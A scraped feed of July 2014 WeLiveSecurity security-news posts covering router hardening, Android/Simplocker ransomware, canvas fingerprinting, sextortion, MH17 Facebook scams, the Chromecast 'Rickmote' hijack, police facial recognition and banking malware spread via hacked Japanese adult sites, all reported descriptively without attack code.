The project also aims to address problems with the security of common home routers – and the fact that their firmware is often updated slowly, or in some cases not at all. Some models even ship with known vulnerabilities - easy prey for attackers.

ESET Senior Research Fellow David Harley says that for many users, a few simple steps could enhance security – without having to grapple with complex software, or buy a new router. “Taking a few simple precautions  would enhance security for quite a lot of home WiFi users – though I don’t have any statistics to say how many networks are relatively insecure.”

“The EFF project isn’t a bad idea – it proposes some useful measures – but right now it addresses a very small part of the problem and a small subset of knowledgeable users. In particular, it’s currently focused on a single router model, which isn’t going to save the world, though it probably won’t do Netgear any harm.”

Wi-Fi security – steps you can take now

A We Live Security video guide offers basic tips on how to secure home routers - and offers a good starting point for ensuring a Wi-Fi network isn’t vulnerable to snoopers and other unwanted ‘guests’.

Harley says, “Firstly, ensure your firmware is kept updated.” Firmware is the code and data which allows routers to function – similar in some ways to a computer operating system, but with the crucial difference that updates (to protect against bugs) often have to be installed manually.

Many users may be unaware that this is something they have to do – and routers tend to be long-lived devices, which can compound the problem. To update, you’ll need to find the routers model number (usually marked on the unit), visit the manufacturer’s website, and see if there is a newer version. Download this to your PC or Mac, then access your router’s controls via its internal IP address (this is usually standard for each manufacturer, and available either in your manual, or via the manufacturer’s site).

Advanced users may want to try some of the existing replacements for router firmware.  ESET Malware Researcher Olivier Bilodeau says “For the relatively advanced consumer: install an alternative open source firmware on your router.” These are replacement versions of the official firmware – and often more secure. This is not for beginner PC users, but clear instructions can be found online as to how to install.

Check your settings again

Changing passwords is an essential first step – but it’s worth checking back that your router’s settings haven’t changed, as this can be a problem with some models.

Harley says that users should always, “Change default router administrator usernames and passwords, and change the default SSID.” The SSID is the name of the network – which is broadcast to anywhere within Wi-Fi range. Leaving it as a default can broadcast information that is useful to an attacker – such as the model of router you are using, or whether you are using one supplied by your ISP. When choosing a new network name, avoid any personally identifying information such as your name or house number.

It’s worth considering making yours a “hidden network” – disabling the broadcast of the SSID’s name. That way you’re less visible to attackers – and to connect new devices, simply type in your network’s name on the gadget.

Harley warns that these precautions can be wasted if your router’s software is updated – which can occasionally revert settings to the default. “After any update, check these settings have not reverted,” he says.

WEP is not your friend

If your family or business has had the same router for  a long time, you may be using WEP – an outdated form of encryption that can be cracked easily, even by unskilled hackers. Most new routers will use the more secure WPA2 standard – but if your router has been around for a while, it’s possible family members may have chosen WEP to connect older devices such as Nintendo’s first DS handheld. “Don’t use WEP encryption, if anyone still is,” Harley says. “If the router doesn’t allow anything else, time to change it. WPA2 is reasonably secure.”

Even if you’ve had trouble connecting mobile devices to a network, leaving it “open” is always a bad idea. Harley says, “ If you’re not using encryption at all, fix it.”

Know who is connecting to your network

Harley says that controlling which devices can connect to a network offers another layer of reassurance. “MAC filtering reduces the risk from intruder machines using your network,” he says.

Any PC or mobile computing device has a unique identifying number known as a MAC address. If you access your router’s settings, you can select which devices can and cannot connect to your network – meaning for instance, a neighbor couldn’t log in, or a teenage visitor could not access unsuitable sites via a smartphone.

Add the MAC addresses of all authorized devices in the home – iPhones, tablets, laptops etc. – to the router’s authorized list. No other device will then be allowed on the network. You can find the MAC addresses of mobile phones and other portable devices under their network settings, though this will vary for each device. Check with the manufacturer.

The organization hopes to develop a means to deliver updates to routers automatically, with firmware signatures fetched via the privacy-focused Tor service to prevent targeted attacks.

The project was launched by privacy and security group the Electronic Frontier Foundation, and is currently under test – the organization has invited hackers and researchers to “test, develop, improve and harden” the software, which will run on a popular Netgear Wi-Fi router.

The post Wi-Fi security – the new ‘bulletproof’ router (and how to toughen yours) appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/22/wi-fi-security-2/feed/ 0
Android/Simplocker using FBI child-abuse warnings to scare victims into paying $300 http://www.welivesecurity.com/2014/07/22/androidsimplocker/ http://www.welivesecurity.com/2014/07/22/androidsimplocker/#comments Tue, 22 Jul 2014 12:12:31 +0000 Android/Simplocker using FBI child-abuse warnings to scare victims into paying $300 http://www.welivesecurity.com/?p=48323 Last time we wrote about Android/Simplocker – the first ransomware for Android that actually encrypts user files – we discussed different variants of the malware and various distribution vectors that we’ve observed. Android/Simplocker has proven to be an actual threat in-the-wild in spite of its weaknesses…

The post Android/Simplocker using FBI child-abuse warnings to scare victims into paying $300 appeared first on We Live Security.

]]>
Last time we wrote about Android/Simplocker – the first ransomware for Android that actually encrypts user files – we discussed different variants of the malware and various distribution vectors that we’ve observed. What initially appeared as just a proof-of-concept  – mainly because of Simplocker’s “not-exactly-NSA-grade” crypto implementation – has proven to be an actual threat in-the-wild in spite of its weaknesses. Also, the malware has been available for sale on underground forums.

Last week we spotted a variant of the ransomware that featured a few significant improvements.

1. Simplocker–FBI-warning12. Simplocker-FBI-warning23. Simplocker-moneypak14. Simplocker-moneypak2

The first change that meets the eye in Android/Simplocker.I is that the ransom message is now in English rather than Russian. The victim is led to believe that the device was blocked by the FBI after detecting illegal activity – child pornography and so on – typical behavior of police ransomware that we’ve seen many times before. The demanded ransom is now 300 USD (as opposed to 260 UAH / 16 EUR / 21 USD) and the victim is instructed to pay it by a MoneyPak voucher. Like other previous Android/Simplocker variants, this one also uses the scareware tactic of displaying the camera feed from the device.

From a technical perspective, the file-encrypting functionality remains virtually unchanged, apart from using a different encryption key, but this recent Simplocker variant does contain two additional tricks to make the victim’s life more miserable.
5. simplocker-code
In addition to encrypting documents, images and videos on the device’s SD card, the trojan now also encrypts archive files: ZIP, 7z and RAR. This ‘upgrade’ can have very unpleasant consequences. Many Android file backup tools (which we strongly recommend, by the way) store the backups as archive files. In case the user has become infected with Android/Simplocker.I, these backups will be encrypted as well.

Secondly, the malware now asks to be installed as Device Administrator, which makes it a lot more difficult to remove. Legitimate Device Administrator applications use these extended permissions for various, mostly security-related reasons. For example, corporate Exchange administrators can enforce password policies, remotely wipe lost or stolen devices, and so on.

Android/Simplocker.I (and other Android ransomware in the past) only uses the functionality for its own protection, since the user must first revoke the application’s Device Administrator rights before uninstalling it. And that’s rather difficult to do when the ransomware is locking your screen.

simplocker-flash

As usual, the trojan will use social engineering to trick the user into installing it – in the screenshot to the left it’s masquerading as a Flash video player.

Our Android/Simplocker detection statistics until today don’t indicate the threat to be widespread in English-speaking countries.

In case your files have been encrypted as a result of an Android/Simplocker infection, you can use the updated ESET Simplocker Decryptor to restore them. But as always, we recommend focusing on prevention ;) Also, while you should be careful when installing any application on your device, be extra careful when the installed application asks for Device Administrator rights.

SHA1 Hash: 72ec80b52ad38417240801dba1a730ab9804a2f9

The post Android/Simplocker using FBI child-abuse warnings to scare victims into paying $300 appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/22/androidsimplocker/feed/ 0
Comic-Con 2014: Eight super-powered digital safety tips http://www.welivesecurity.com/2014/07/22/comic-con-2014/ http://www.welivesecurity.com/2014/07/22/comic-con-2014/#comments Tue, 22 Jul 2014 12:05:45 +0000 Comic-Con 2014: Eight super-powered digital safety tips http://www.welivesecurity.com/?p=47998 Over the past few years, Comic-Con has had over 130,000 attendees, and those attendees tend to be very digitally literate - so that means we will probably see double that number of connected devices - laptops, tablets, smartphones and perhaps even tricorders.

The post Comic-Con 2014: Eight super-powered digital safety tips appeared first on We Live Security.

]]>
Like winter, Comic-Con 2014 is coming to San Diego. However, instead of bringing direwolves, white walkers, and the occasional dragon or three [or, at least, in addition to these], we can expect over 100,000 attendees to march on America’s Finest City between July 24-27, in search of not just comics, but such treasure as the latest in news on movies and books, not to mention a few collectible items of their favorite characters.

Over the past few years, Comic-Con has had over 130,000 attendees, and those attendees tend to be more digitally literate than other groups, so that means we will probably see well over double that number of connected devices in the form of laptops, tablets, smartphones and perhaps even tricorders. With that in mind, we have conjured up the following tips to keep your digital companions safe while in San Diego for Comic-Con 2014 (and possibly other parts of the multiverse as well)…

Comic-Con 2014: Safety tips

Tip # (there can be only) 1: Turn off Bluetooth, cellular, NFC and Wi-Fi radios on your tablets, smartphones, etc., when not in use. Not only will this will save battery life, it will prevent unwanted connections from other devices. Also, be careful about using public Wi-Fi.

Tip # 2: Install anti-theft software on laptops, smartphones and tablets. That way, if your device gets lost, stolen or enters a pocket dimension, you have a better chance of recovering it.

Tip # 3: Password-protect and encrypt any computing devices you take with you. While this will not stop cat burglars, jewel thieves or plain old villainous scum from stealing them, it will help ensure your private information remains private, and choosing a strong password helps ensure it will take even the smartest android in Starfleet years, if not decades, to brute force or guess it. For tips on creating strong passwords, see this presentation on passwords and PINs.

Tip # (fantastic) 4: Upload any videos and pictures you have recorded on a daily basis, if not more frequently. That way, if your device gets lost or stolen, or the SD Card or drive fails, you will still have a copy of that favorite interview or awesome cosplay.

Tip # 5 (is alive): Even if your electronic devices are too big to fit into the hotel safe, their storage cards will fit, and some laptops even have hard disk drives that can be easily removed, too. If your hotel safe allows you to set a PIN to unlock it, see the presentation mentioned in tip #3, above, for a list of PINs not to use.

Tip # (sinister) 6: If you are buying collectibles with digital storage, such as USB flash drives, be sure any autorun or autoplay are disabled on your computer before plugging them in, and prepare to format them the first time you use them. Better yet, since collectibles are always more valuable left in their original packaging, it might be best to leave them that way. Likewise, if you come across any USB flash drives, SD Cards or other media lying around, do not insert them into unsecured computers. It could be a trap!  Turn them in to Lost and Found, instead.

Tip # 007: You might see a few public charging stations for smartphones and tablets. If you have brought your own AC adapter or a battery pack, it is safe to “top off” these devices from charging stations. But be wary of outlets providing USB connectors, which might be used to copy files off of your device or install unwanted programs.

Tip # 8 (bit): We estimate over an additional quarter of a million wireless devices will be in San Diego the week of Comic-Con, which means it is likely Internet connections, especially Wi-Fi and 3G/4G, will be slow. Be sure to update and patch your operating systems, perform full system backups and update your security software before you begin your quest.

Regardless of whether you are guarding the galaxy or merely intend to kick back, relax and take in the sights of Comic-Con 2014, here are some related articles you might find of interest from We Live Security:

And, from We Live Security’s sister site, GoExplore.Net:

You might also find the personal blog posts from ESET employees of use as well:

  • Homo Avionus – a blog dedicated to airplane travel by one of ESET’s frequent travelers
  • A dozen quick travel tips – an article with some tips and tricks on how to prepare for your trip

Lastly, I’d like to provide one little tip for those of you who might be flying into San Diego: if you get a window seat on the left side of the airplane, you’ll see ESET’s office just before you land. And, perhaps, if you stop by the office, we’ll have some special collectible items just for you.

In the meantime, we hope that you have the Best. Time. Ever. at Comic-Con!

Kudos to my fellow crime-fighters Bruce P. Burrell, Lysa Myers and Daniel Womack for their super-powered assistance with this article.
Aryeh Goretsky, MVP, ZCSE
Distinguished Researcher

The post Comic-Con 2014: Eight super-powered digital safety tips appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/22/comic-con-2014/feed/ 0
Online privacy – millions spied on by “unblockable” ad-snooper http://www.welivesecurity.com/2014/07/22/online-privacy/ http://www.welivesecurity.com/2014/07/22/online-privacy/#comments Tue, 22 Jul 2014 11:58:49 +0000 Online privacy – millions spied on by “unblockable” ad-snooper http://www.welivesecurity.com/?p=48313 A new kind of web tracking tool bypasses the protections privacy-conscious web users rely on and is already being used to track users across thousands of sites - without users being aware of it.

The post Online privacy – millions spied on by “unblockable” ad-snooper appeared first on We Live Security.

]]>
A new, invisible web tracking tool bypasses the protections privacy-conscious web users rely on (including browser privacy settings, do-not-track instructions, or tools such as AdBlock Plus) and is already being used by thousands of sites – without visitors being aware, as reported by Pro Publica.

A single company which uses the ‘fingerprinting’ technique, touted as a replacement for cookies for advertisers, uses its scripts in thousands of sites including Whitehouse.gov – and reaches 97.2% of the internet-using population in the U.S., according to Comscore.

The technique, known as “canvas fingerprinting” covertly requires  browsers to “draw” a short message (the user does not see this, and is not made aware of it) – and subtle differences in the way machines render the text make it easy to identify the machine, even if the user is employing cutting-edge online privacy tools, Network World reports.

The unique code can then be used to track users across sites to serve adverts, even if the user employs online privacy tools to prevent this.

Online privacy – defenses “shattered”

Princeton University researchers found that the technique, which works in “a fraction of a second without user’s awareness” was not only theoretically possible – but already in use on more than 5% of the 100,000 sites under test.

“By crawling the homepages of the top 100,000 sites we found that more than 5.5% of the crawled sites include canvas fingerprinting scripts,” the researchers write. “Although the overwhelming majority (95%) of the scripts belong to a single provider (addthis.com), we discovered a total of 20 canvas fingerprinting provider domains, active on 5542 of the top 100,000 sites.”

“Our evaluation of the defensive techniques used by privacy-aware users finds that there exist subtle pitfalls such as failing to clear state on multiple browsers at once in which a single lapse in judgement can shatter privacy defenses,” the Princeton researchers write in an upcoming paper entitled The Web Never Forgets.

Many of the sites employing “canvas fingerprinting” were using scripts from a single provider – AddThis, which began testing the scripts in January 2014, according to the researchers. But AddThis is not alone – sites such as dating service PlentyOfFish also employ the technology.

The researchers suggest that by correlating this information with identifying information provided by cookies, advertising companies are actually “advancing technology beyond the scientific literature.”

AddThis in particular employs techniques more advanced than those detailed in previous scientific papers.

“By requesting a non-existent font, the test tries to employ the browser’s default fallback font. This may be used to distinguish between different browsers and operating systems,” the researchers write. “This has serious implications for any web user wishing to avoid being tracked – and to avoid “personalised” adverts. Even sophisticated users face great difficulties in evading tracking techniques”

“According to a recent ComScore report, AddThis solutions”reaches 97.2% of the total Internet population in the UnitedStates and get 103 billion monthly page views,” the researchers write.

Online privacy – protect yours

Blocking canvas fingerprinting is not easy, the researchers admit – there are solutions, but these involve radical changes to the browsing experience.

The privacy focused browser Tor offers a function which notifies users when a script requests a canvas fingerprint – but as Pro Publica warns, this can be slow.

Pro Publica offers advice on how to protect against the technique – with methods such as disabling Javascript, which can cause many websites to function wrongly. Other methods include manual blocks of known fingerprinters. The full guide can be read here.

The post Online privacy – millions spied on by “unblockable” ad-snooper appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/22/online-privacy/feed/ 0
‘Sextortion’ blackmail attacks on the rise, Police warn http://www.welivesecurity.com/2014/07/21/sextortion/ http://www.welivesecurity.com/2014/07/21/sextortion/#comments Mon, 21 Jul 2014 14:43:24 +0000 ‘Sextortion’ blackmail attacks on the rise, Police warn http://www.welivesecurity.com/?p=48270 ‘Sextortion’ attacks where cybercriminals blackmail victims with the threat of exposing explicit photographs or messages are increasingly common, according to a report by Bloomberg News.

The post ‘Sextortion’ blackmail attacks on the rise, Police warn appeared first on We Live Security.

]]>
‘Sextortion’ attacks, where cybercriminals blackmail victims with the threat of exposing explicit photographs or messages are becoming increasingly common, according to a report by Bloomberg News.

The FBI has issued warnings that sextortion is on the rise – with attackers using methods including searching stolen computer equipment for explicit imagery, hacking social media accounts and using malware to steal images from computers.

Bloomberg describes one case in which a young mother (name withheld) was driven to suicide, and interviewed a New Hampshire woman whose suffering at the hands of a “sextortionist” left her feeling traumatised two years later.

Previous reports have highlighted cases in which children were targeted and blackmailed into uploading further naked pictures, which were then traded among paedophiles online.

Sextortion is ‘growing problem’

“This is a growing problem,” said Wesley Hsu, chief of the cyber crimes unit at the U.S. Attorney’s Office in Los Angeles. Hsu says that the threat of exposure in sextortion attacks is particularly distressing as the internet is “quite permanent”.

Bloomberg reports that at least 20 criminals have been prosecuted for such scams – with victims thought to number in the thousands. The FBI has previously warned of a growing number of criminals involved in “sextortion”.

How to avoid falling prey to sextortion

ESET security researcher Lysa Myers offers tips on how to avoid falling prey to sextortion – saying that criminals may try to befriend victims and trick them into sharing pictures, or may use malware to target victims’ webcams and take pictures themselves.

“There are two types of behaviors that are used in this crime,” Myers writes. “Trust-based tactics where the criminals take advantage of the relative anonymity of the Internet to trick victims into trusting them and revealing very personal details or sending revealing images. The criminals then use these as leverage to force their victims into sending more compromising pictures.”

Criminals also target victims with malware designed specifically for this form of attack, Myers says: “Malware-based attacks target the victim with malware that stealthily turns on the victim’s webcam. In this case the victim herself unwittingly provides revealing images that the criminal can use for blackmail to get the victim to provide yet more compromising pictures.”

Often, attackers use the threat of exposure to harvest more explicit pictures – and the FBI warns the tactic is often used against teenage girls. In one case, a 25-year-old, Brian Caputo has been indicted for an alleged eight-year campaign in which he targeted young females via social sites, and traded hundreds of explicit images with others on child pornography websites.

The FBI said, “Caputo convinced one minor female to take and then upload more than 660 sexually explicit images of herself to a Dropbox account controlled by Caputo. When agents executed a search warrant at his residence in Arvin on February 28, 2014, Caputo’s cell phone contained hundreds of images of girls ages 11-15 undressing, nude, or engaging in sexually explicit conduct. Caputo then traded the images with other Internet users.”

Predatory scammers also target victims via dating sites – where the scammer trades pictures with a victim, then threatens them with exposure. Even explicit messages can leave daters open to this form of attack.

Dating scams are one of the fastest-growing areas of fraud online, with a 27% rise year-on-year reported in the UK. The FBI issued an official warning this year, saying that women over 40 were particularly at risk.

“Their most common targets are women over 40, who are divorced, widowed, and/or disabled, but every age group and demographic is at risk,” the FBI said, “Here’s how the scam usually works. You’re contacted online by someone who appears interested in you. He or she may have a profile you can read or a picture that is emailed to you.”

Mark Brooks of Online Personals Watch offers tips on how to spot fake profiles on dating sites – and avoid being conned out of money, or threatened with exposure online.

The post ‘Sextortion’ blackmail attacks on the rise, Police warn appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/21/sextortion/feed/ 0
Insider threat – should you worry about the ‘enemy within’? http://www.welivesecurity.com/2014/07/21/insider-threat/ http://www.welivesecurity.com/2014/07/21/insider-threat/#comments Mon, 21 Jul 2014 14:06:49 +0000 Insider threat – should you worry about the ‘enemy within’? http://www.welivesecurity.com/?p=48263 Disgruntled employees and other malicious insiders could be one of the most serious security threats companies face - but the importance of the threat from the ‘enemy within’ varies according to who you ask.

The post Insider threat – should you worry about the ‘enemy within’? appeared first on We Live Security.

]]>
Disgruntled employees and other malicious insiders could be one of the most serious security threats companies face – but the importance of the threat from the ‘enemy within’ varies according to who you ask.

A survey of IT security professionals at this year’s Infosecurity Europe trade event found that a (20%) of organizations believe that insider threats pose the most serious threat to corporate security, according to Information Age.

The opinion of IT professionals surveyed at the RSA found that the largely U.S. group under survey believed that outsiders posed a far more serious threat than insider threats – and just 5% of respondents blamed insiders.

Insider threat – a real danger?

Fudzilla reports that nearly two thirds of U.S. professionals regarded outside criminal groups as the biggest threat faced by companies – versus 35% in the UK.

Both groups agreed that employee error and ignorance posed a serious threat to organizations – with 44% of Infosec attendees believing that human error is the most frequent point of failure faced by organizations, along with 33% of those surveyed at RSA.

Both groups were in agreement that employees, rather than technology, were the weak spot in company security systems – with 70% of UK respondents and 71% of US respondents saying that ‘people’ were the weak link in corporate systems.

Human error

ESET Senior Research Fellow David Harley said, “I’d have to agree that a very high proportion of security breaches are caused directly or indirectly by people inside an organization, whether it’s a matter of human error, susceptibility to social engineering, bad security management decisions, and so on. I’m not convinced that deliberate malicious action from insiders outweighs all those other factors.”

Both groups cited malware as the most dangerous attack vector, combined with the use of social engineering – and Appriver, the specialist app security company which conducted the surveys said that companies had seen a “dramatic increase” in phishing attacks.

“Whilst the US blames external influences, the UK recognises it is their own people who can act as the weakest link in an organisation’s IT security posture – with ignorance the overarching driver. While it’s hard to plan for ignorance, the combination of education and automation would certainly help mitigate most non-malicious threats especially as many IT professionals have faith in the technology they’re deploying,” said Troy Gill, senior security analyst of AppRiver.

The post Insider threat – should you worry about the ‘enemy within’? appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/21/insider-threat/feed/ 0
Facebook scams target grieving families of Flight MH17 http://www.welivesecurity.com/2014/07/21/facebook-scams/ http://www.welivesecurity.com/2014/07/21/facebook-scams/#comments Mon, 21 Jul 2014 13:49:47 +0000 Facebook scams target grieving families of Flight MH17 http://www.welivesecurity.com/?p=48254 Callous cybercriminals have used the Malaysia Airlines Flight MH17 tragedy as a lure for Facebook scams - creating fake profiles for victims of the crash.

The post Facebook scams target grieving families of Flight MH17 appeared first on We Live Security.

]]>
Callous cybercriminals have used the Malaysia Airlines Flight MH17 tragedy as a lure for Facebook scams – creating fake profiles for victims of the crash, including children, according to the Daily Mail’s report.

The fake Facebook scam profiles have since been closed down by Facebook, IB Times reports – but are part of a disturbing trend where criminals attempt to make money out of grieving families, Mashable reports.

Facebook scam pages were set up for at least five Australian citizens, including three children, and for nationals of other countries including Americans and Britons.

Facebook scams target victims

The pages appear to have been created with the goal of driving friends, curious browsers and relatives towards dubious sites – including video “news” showing the moment of the crash.

The Canberra Times reports that the fake profiles all contained links to a single blog site which purported to offer information on the crash. Instead, the site bombarded users with pop-up adverts for online gambling sites and get-rich-quick schemes.

One of the links purported to direct users to a video showing the moment of the crash, entitled, ““Video Camera Caught the moment plane MH17 Crash over Ukraine. Watch here the video of Crash.” This tactic is becoming depressingly common in the wake of tragedies – We Live Security offers a guide to spotting scam news stories, and why clicking on the link is never advisable.

Alistair MacGibbon of the University of Canberra said that the criminals would hope to make money for referring victims to unscrupulous sites – and that the practice was increasingly common.

“Crooks are super-fast these days at picking up on anything that’s remotely topical, and working out how to monetise it from a criminal point of view,” he said. “It’s a really distasteful trend.”.

Facebook scams – “distasteful trend”

IB Times reports that while Facebook has rapidly removed false profiles, scams continue to circulate, including fake “news” shared via Twitter.

Scammers often target Facebook with copies of news stories or viral content – or entirely fake, sensational videos, such as ‘Giant Snake Swallows Zookeeper’, as reported by We Live Security this year.

ESET researcher Stephen Cobb offers a We Live Security Guide to spotting Facebook scams, “Can we trust our friends not to make questionable decisions on social media? Apparently not, because our friends might actually be scammers in disguise, or just not well-informed.”

In many cases, scam videos will install a ‘rogue’ Facebook app to spread rapidly via the network but such scams can also lead to tainted sites which infect users with malware.

The post Facebook scams target grieving families of Flight MH17 appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/21/facebook-scams/feed/ 0
Smart Phone, Safe Car? http://www.welivesecurity.com/podcasts/smart-phone-safe-car/ http://www.welivesecurity.com/podcasts/smart-phone-safe-car/#comments Fri, 18 Jul 2014 21:17:00 +0000 Smart Phone, Safe Car? http://www.welivesecurity.com/?post_type=post_podcast&p=48227 The post Smart Phone, Safe Car? appeared first on We Live Security.

]]>
The post Smart Phone, Safe Car? appeared first on We Live Security.

]]>
http://www.welivesecurity.com/podcasts/smart-phone-safe-car/feed/ 0
Wi-Fi security alert on Chromecast as ‘Rickmote’ hijacks nearby boxes http://www.welivesecurity.com/2014/07/17/wi-fi-security/ http://www.welivesecurity.com/2014/07/17/wi-fi-security/#comments Thu, 17 Jul 2014 13:44:37 +0000 Wi-Fi security alert on Chromecast as ‘Rickmote’ hijacks nearby boxes http://www.welivesecurity.com/?p=48112 A security researcher has built a remote control which hijacks any nearby Chromecast highlighting a Wi-Fi security issue, which allows an attacker to play a 'surprise' video on nearby gadgets.

The post Wi-Fi security alert on Chromecast as ‘Rickmote’ hijacks nearby boxes appeared first on We Live Security.

]]>
Concern has risen over Google’s popular Chromecast TV streamer’s Wi-Fi security, after a security researcher unveiled a ‘Rickmote’ remote control which hijacks any nearby Chromecast via Wi-Fi (without requiring a password), and plays the timeless internet joke/Eighties pop staple Never Gonna Give You Up by Rick Astley on a loop.

The ‘Rickmote’ device has a large orange button with emblazoned with Rick Astley’s face, and hijacks the popular Google TV dongle via its simplified Wi-Fi connection, according to PC World. The result is a looped video of the popular video, a meme where web users attempted to trick one another into following links containing it.

More details of the hack are to be revealed soon, but its creator says that it could be used for more damaging purposes than tormenting neighbours with Eighties pop.

The gadget is based on the popular Raspberry Pi mini-computer, a hit with DIY computing enthusiasts, and was created by security researcher Dan Petro of the consultancy Bishop Fox.

Wi-Fi security hack explained

Petro wrote in a blog post this week, “How is it possible to hijack unsuspecting Chromecast users’ TVs, turning their “Game of Thrones” marathon into a 1980s flashback? The Rickmote accomplishes this by briefly disconnecting nearby Chromecasts from their Wi-Fi.”

“When this loss of connectivity occurs, the Chromecast tries to reconfigure and accepts commands from anyone within proximity. The Rickmote automatically provides this configuration in the form of everyone’s favorite Rick Astley song on loop.”

Rickmote – passwords at risk?

The hack takes around 30 seconds, but all Chromecasts within Wi-Fi range are vulnerable, and users could in theory play any video, not just the traditional Never Gonna Give You Up, according to a report in Wired.

Petro says that he discovered a further bug in Chromecast which may make it possible for an attacker to extract a home’s Wi-Fi password – potentially a much more serious Wi-Fi security concern.

“This is actually a really hard problem, and it’s not clear that it’s ever going to get fixed,” Petro said.

Google has provided no comment on the issue at time of writing. Further video evidence is available via this link.

Petro is due to disclose further details of the hack, and the device at Black Hat Tools Arsenal USA on August 6, where he promises to show off a step-by-step guide to turning a Raspberry Pi into an automated Chromecast hacker which rickrolls all boxes within Wi-Fi range.

The post Wi-Fi security alert on Chromecast as ‘Rickmote’ hijacks nearby boxes appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/17/wi-fi-security/feed/ 0
Router attacks: Five simple tips to lock criminals out http://www.welivesecurity.com/videos/router-attacks-five-simple-tips-lock-criminals/ http://www.welivesecurity.com/videos/router-attacks-five-simple-tips-lock-criminals/#comments Wed, 16 Jul 2014 14:57:23 +0000 Router attacks: Five simple tips to lock criminals out http://www.welivesecurity.com/?post_type=post_video&p=48062 Cyber criminals are constantly targeting home routers and its becoming increasingly difficult to keep them secure. Follow these 5 simple tips from We Live Security to lock criminals out.

The post Router attacks: Five simple tips to lock criminals out appeared first on We Live Security.

]]>
Cyber criminals are constantly targeting home routers and its becoming increasingly difficult to keep them secure. Follow these 5 simple tips from We Live Security to lock criminals out.

The post Router attacks: Five simple tips to lock criminals out appeared first on We Live Security.

]]>
http://www.welivesecurity.com/videos/router-attacks-five-simple-tips-lock-criminals/feed/ 0
Privacy concerns over Police ‘instant ID’ camera trial http://www.welivesecurity.com/2014/07/16/privacy/ http://www.welivesecurity.com/2014/07/16/privacy/#comments Wed, 16 Jul 2014 14:50:38 +0000 Privacy concerns over Police ‘instant ID’ camera trial http://www.welivesecurity.com/?p=48050 New facial recognition technology which can instantly identify people from any digital image in seconds is being trialled in the UK for the first time.

The post Privacy concerns over Police ‘instant ID’ camera trial appeared first on We Live Security.

]]>
New facial recognition technology which can instantly identify people from any digital image in seconds is being trialled in the UK for the first time.

Leicestershire Police has become the first UK force to trail NEC’s Neoface software – and say it will be used on CCTV and body camera footage, according to The Next Web’s report. Privacy groups such as Britain’s Big Brother Watch have raised concerns over the technology – saying it represents the “next level” of surveillance, according to the BBC’s report.

Under UK law, the software’s identification is inadmissible in a court of law, but Leicestershire police say that it can save time searching for potential matches for faces. At present, the British force performs the searches manually.

In America, Neoface has been used to convict an armed robber in Chicago, which has 22,000 cameras linked to the software, according to Engadget’s report. Pierre D Martin was sentenced to 22 years in prison earlier this year.

Privacy group warns of ‘next level’ of surveillance

Leicestershire police said that early trials of the system offered a high success rate, and dismissed concerns over privacy, saying that their image database consisted of people .

Chief Inspector Chris Cockerill said: “We’re very proud to be the first UK Police force to evaluate this new system. Initial results have been very promising and we’re looking forward to seeing what can be achieved throughout the six month trial.”

Identity unit Manager Andy Ramsay said: “We have over ninety-thousand photos on our system and Neo-Face can compare someone’s image against our complete databases in seconds. Besides the speed it’s also impressive because it can even find family members related to the person we’re trying to identify.”

22 years in jail

Earlier this year, the biometric facial recognition software was used to convict an armed robber, with a Chicago criminal “matched” from CCTV footage to a mug shot, and sentenced to 22 years in prison, according to the Chicago-Sun Times.

Sky News said that the case marked the first conviction obtained using NeoFace – face-recognition software purchased by the Chicago Police Department for $5.4m.

Engadget points out that the case has eerie echoes of the videogame Watch Dogs – a cybercrime-heavy science fiction hit inspired in part by Chicago’s use of 22,000 face-recognition cameras. We Live Security took a look at the realism (or otherwise) of the game’s world of all-seeing cameras and super-powered smartphone apps in this feature.

The software used to “match” Martin’s image to a database of several million police mugshots was made by NEC, according to Silicon Republic’s report. The software has also been bought by other police departments, and by businesses wishing to keep track of  customers via CCTV, the site reported.

Further We Live Security stories dealing with the emerging technology can be found here.

The post Privacy concerns over Police ‘instant ID’ camera trial appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/16/privacy/feed/ 0
Hacked Japanese porn sites spread banking malware attack http://www.welivesecurity.com/2014/07/16/hacked-japanese-porn-sites/ http://www.welivesecurity.com/2014/07/16/hacked-japanese-porn-sites/#comments Wed, 16 Jul 2014 11:41:49 +0000 Hacked Japanese porn sites spread banking malware attack http://www.welivesecurity.com/?p=47732 Thinking of spending some time perusing Japanese porn websites before you do your online banking? Security researchers at ESET have analysed an organised malware campaign that stole the login credentials of online banking customers after infecting PCs that had visited X-rated websites.

The post Hacked Japanese porn sites spread banking malware attack appeared first on We Live Security.

]]>
Thinking of spending some time perusing Japanese porn websites before you do your online banking?

You might want to think again.

Security researchers at ESET have published a detailed analysis of an organised malware campaign that stole the login credentials of online banking customers after infecting PCs that had visited X-rated Japanese websites.

ESET’s team of experts have taken a close look at the Win32/Aibatook malware that targets users of Internet Explorer who are customers of Japanese banks, and in particular visitors to some of the country’s most popular pornographic websites:

sokuhabo.net
www.uravidata.com
ppv.xxxurabi.com
mywife.cc

Upon visiting any of the above compromised sites, users can be redirected to an exploit page that attempts to take advantage of Java vulnerability CVE-2013-2465.

Of course, it’s important to point out that any website can potentially be compromised, and be running malicious code designed to infect a visiting computer. It’s not the case that an adult website is necessarily more dangerous to your computer’s health than, say, the website belonging to a major American television network or a website devoted to a programming language.

But criminals eager to break into bank accounts certainly have no qualms about hacking porn websites, in the knowledge that they are likely to receive lots of traffic (and hence guaranteed to generate more victims).

It is perhaps unusual, however, to see only one single vulnerability exploited – rather than the more common approach used by cybercriminals today to use an exploit kit to attempt a battery of attacks against visiting computers, hoping to find one which hits the bullseye.

Regardless, the criminals clearly think that their approach works well enough, and an unassauming 404 error message is displayed when the user’s browser is redirected to a third-party website.

Error message or exploit?

The 404 “Page not found” error message may seem unassuming enough to the casual observer, but a quick look at the webpage’s source code reveals that is more than a simple error page – and secretly harbours code to run a malicious Java applet.

Source code of webpage

In a seeming attempt to avoid detection, the code contains a counter which appears to be designed to only insert the snippet of HTML for a limited number of victims each day.

With the malware now in place, it can begin to do the rest of its dirty work – waiting for victims to log into online banks with Internet Explorer (the most widely-used browser in Japan) and inject bogus forms into the process.

Japanese bank malware attack

